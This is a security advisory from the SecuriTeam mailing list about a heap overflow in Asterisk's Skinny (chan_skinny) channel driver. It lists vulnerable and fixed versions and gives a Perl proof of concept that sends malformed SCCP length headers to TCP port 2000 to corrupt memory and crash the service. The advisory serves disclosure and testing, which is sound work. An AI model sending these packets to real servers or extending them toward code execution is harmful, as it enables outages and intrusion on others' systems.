The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Asterisk Skinny Heap Overflow (PoC)
------------------------------------------------------------------------
SUMMARY
The Asterisk Skinny channel driver for Cisco SCCP phones chan_skinny.so)
incorrectly validates a length value in the packet header. An integer
wrap-around leads to heap overwrite, and arbitrary remote code execution
as root, the following exploit code can be used to test your system for
the mentioned vulnerability.
DETAILS
Vulnerable Systems:
* Asterisk version 1.2.12.1 and prior
* Asterisk version 1.0.12 and prior
Immune Systems:
* Asterisk version 1.4.0-beta1
* Asterisk version 1.4.0-beta2
* Asterisk version 1.2.13
* Asterisk version 1.0.13
Exploit:
#!/usr/bin/perl
# Beyond Security
# Copyright Noam Rathaus <noamr@beyondsecurity.com>
#
# The following proof of concept causes the chan_skippy to crash in
different locations and due to
# memory corruption as well as double free calls, this is based on the
finding of
# Security-Assessment.com, and proves that the vulnerability is indeed
exploitable and there...
#
use IO::Socket;
use strict;
my $target = "127.0.0.1";
my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target,
PeerPort => "2000");
unless ($remote) { die "cannot connect to skinny daemon on $target" }
my $packet = "A"x1000; #Causes *** glibc detected *** malloc(): memory
corruption: 0x08175830 ***
my $packet = "\x30\xE0\x00\x00"."\x00\x00\x00\x00".("A"x1000); # *** glibc
detected *** double free or corruption (!prev): 0x08184348 ***
my $packet = "\xE5\x03\x00\x00".("A"x996); # *** glibc detected *** double
free or corruption (out): 0x08171740 ***
my $packet = "\xF0\xFF\xFF\xFF".("A"x996); # Program received signal
SIGSEGV, Segmentation fault.
#[Switching to Thread -1494127696 (LWP 9909)]
#0xa76264cb in skinny_session (data=0x8183ee8) at chan_skinny.c:2896
#2896 memcpy(req, s->inbuf, letohl(*(int*)(s->inbuf))+8);
print $remote $packet;
ADDITIONAL INFORMATION
The information has been provided by <mailto:noamr@beyondsecurity.com>
Noam Rathaus.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
